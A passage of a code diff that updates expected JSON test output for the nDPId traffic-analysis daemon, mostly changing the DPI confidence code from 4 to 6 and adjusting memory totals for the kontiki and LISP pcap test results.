00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1213662198700,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1213662198700,"pkt":"AAAMB6wIABVYKKDoCABFAAAgD6YAAAYRpbUKGSA7QMiUVk3sIrgADIy+AgEBAA=="} 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198701,"flow_last_seen":1213662198701,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198701,"l3_proto":"ip4","src_ip":"4.79.219.125","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1213662198701,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1213662198701,"pkt":"ABVYKKDoANAreRD8CABFwAA4\/Y8AAPoBuFQET9t9ChkgOwsADhsAAAAARQAAIA+mAAABEaq1ChkgO0DIlFZN7CK4AAx2NA=="} -00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198701,"flow_last_seen":1213662198701,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198701,"l3_proto":"ip4","src_ip":"4.79.219.125","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} +00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662198701,"flow_last_seen":1213662198701,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662198701,"l3_proto":"ip4","src_ip":"4.79.219.125","dst_ip":"10.25.32.59","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1213662200284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1213662200284,"pkt":"AAAMB6wIABVYKKDoCABFAAAwEAgAACARi0EKGSA7QMiUWE3sAFAAHLz5AgUiAE9LWIs\/euHNAAAE5AIEAQA="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1213662200285,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1213662200285,"pkt":"ABVYKKDoANABJAf8CABFAAA4wRIAAP8BpkIKGSADChkgOwMN8aAAAAAARQAAMBAIAAAfEYxBChkgO0DIlFhN7ABQABy8+Q=="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2709,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1213662202284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1213662202284,"pkt":"AAAMB6wIABVYKKDoCABFAAAwEJ8AACARiqoKGSA7QMiUWE3sAFAAHLz5AgUiAE9LWIs\/euHNAAAE5AIEAQA="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2710,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1213662202285,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1213662202285,"pkt":"ABVYKKDoANABJAf8CABFAAA4wVoAAP8BpfoKGSADChkgOwMN8aAAAAAARQAAMBCfAAAfEYuqChkgO0DIlFhN7ABQABy8+Q=="} 
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198701,"flow_last_seen":1213662198701,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"4.79.219.125","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198488,"flow_last_seen":1213662198488,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"216.168.241.157","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":3274,"flow_first_seen":1213662198289,"flow_last_seen":1213662202882,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":1241,"flow_tot_l4_payload_len":3714566,"flow_avg_l4_payload_len":1134,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.86","src_port":19948,"dst_port":8888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} -00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1213662198298,"flow_last_seen":1213662202883,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.3","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.249.14","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
+00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198701,"flow_last_seen":1213662198701,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"4.79.219.125","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198488,"flow_last_seen":1213662198488,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"216.168.241.157","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":3274,"flow_first_seen":1213662198289,"flow_last_seen":1213662202882,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":1241,"flow_tot_l4_payload_len":3714566,"flow_avg_l4_payload_len":1134,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.86","src_port":19948,"dst_port":8888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} +00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1213662198298,"flow_last_seen":1213662202883,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.3","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1213662198289,"flow_last_seen":1213662198289,"flow_idle_time":140000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.249.14","dst_ip":"10.25.32.59","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662195077,"flow_last_seen":1213662195077,"flow_idle_time":200000,"flow_min_l4_payload_len":991,"flow_max_l4_payload_len":991,"flow_tot_l4_payload_len":991,"flow_avg_l4_payload_len":991,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"255.255.255.255","src_port":19948,"dst_port":19948,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1213662195077,"flow_last_seen":1213662195077,"flow_idle_time":200000,"flow_min_l4_payload_len":991,"flow_max_l4_payload_len":991,"flow_tot_l4_payload_len":991,"flow_avg_l4_payload_len":991,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"255.255.255.255","src_port":19948,"dst_port":19948,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1213662198289,"flow_last_seen":1213662198301,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.82","src_port":19948,"dst_port":1948,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1213662198289,"flow_last_seen":1213662198301,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.82","src_port":19948,"dst_port":1948,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1213662198298,"flow_last_seen":1213662202883,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.88","src_port":19948,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} 
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1213662198298,"flow_last_seen":1213662202883,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1213662202883,"l3_proto":"ip4","src_ip":"10.25.32.59","dst_ip":"64.200.148.88","src_port":19948,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Kontiki","breed":"Potentially Dangerous","category":"Media"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3289,"source":"kontiki.pcap","alias":"nDPId-test","packets-captured":3289,"packets-processed":3289,"total-skipped-flows":0,"total-l4-payload-len":3716430,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1213662202883} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3289/3289 
@@ -49,9 +49,9 @@
 ~~ total active/idle flows...: 8/8
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5972216 bytes
-~~ total memory freed........: 5972216 bytes
-~~ total allocations/frees...: 121430/121430
+~~ total memory allocated....: 6105850 bytes
+~~ total memory freed........: 6105850 bytes
+~~ total allocations/frees...: 124192/124192
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 444 chars
 ~~ json string max len.......: 1778 chars
diff --git a/test/results/lisp_registration.pcap.out b/test/results/lisp_registration.pcap.out
index ad591662c..5005c6766 100644
--- a/test/results/lisp_registration.pcap.out
+++ b/test/results/lisp_registration.pcap.out
@@ -2,28 +2,28 @@ 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1597152685554} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152685554,"flow_last_seen":1597152685554,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1597152685554,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1597152685554,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1597152685554,"pkt":"qrvMAAEAqrvMAAIACABFwAB0AJYAAP8RsB8KAHsCCgB7ARD2EPYAYGa4MgABAWerkx+ei5dKAAEAFLdG1odgiOW+z\/RAIKtUGCaiNO0QAAAFoAEgEAAAAAABCgAAAhYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152685554,"flow_last_seen":1597152685554,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1597152685554,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152685554,"flow_last_seen":1597152685554,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1597152685554,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1597152685555,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152685555,"pkt":"qrvMAAEAqrvMAAIACABFwACAAJcAAP8RsBIKAHsCCgB7ARD2EPYAbMDFMgABAT470dH4ChLaAAEAFJgCmsMIGdOV75RgmwLw3u2YWic1AAAFoAGAEAAAAAAC\/AAAAAAAAAAAAAAAAAAAAhYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="} 
00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1597152685555,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152685555,"pkt":"qrvMAAEAqrvMAAIACABFwACAAJgAAP8RsBEKAHsCCgB7ARD2EPYAbFMcMgABAecEMPyhgJYjAAEAFLR7gLhELdB05V0IZvC04Du3TwxeAAAFoAEaEAAAAEADAAACIAAKAAAAZAABwKhmABYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152687289,"flow_last_seen":1597152687289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152687289,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1597152687289,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687289,"pkt":"qrvMAAEAqrvMAAIACABFwAAs6QkAAP8Gx\/4KAHsCCgB7ATwNEPYND3HOAAAAAGACQACCQgAAAgQFtAAA"} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1597152687290,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687290,"pkt":"qrvMAAIAqrvMAAEACABFwAAszvYAAP8G4hEKAHsBCgB7AhD2PA22haFWDQ9xz2ASQAAqVQAAAgQFtAAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1597152687291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152687291,"pkt":"qrvMAAEAqrvMAAIACABFwAAo6QoAAP8GyAEKAHsCCgB7ATwNEPYND3HPtoWhV1AQQABCEgAAAAAAAAAA"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152687289,"flow_last_seen":1597152687436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152687436,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152687289,"flow_last_seen":1597152687436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152687436,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1597152709936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACQAEwAAP8RsEwKAHsDCgB7ARD2EPYAfBP6MgABAnsDNrGOEKjEAAEAFGka+80ImORwcY2JmGWtrFsZgmcCAAAFoAEaEAAAAAABwKhnAP8hISEABQABCgB7AwAABaABIBAAAAAAAQoAAAMhISEhAAUAAQoAewNZ6z+5+pkdP+8AUonJfzt9AAAAAAAAAAA="} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": 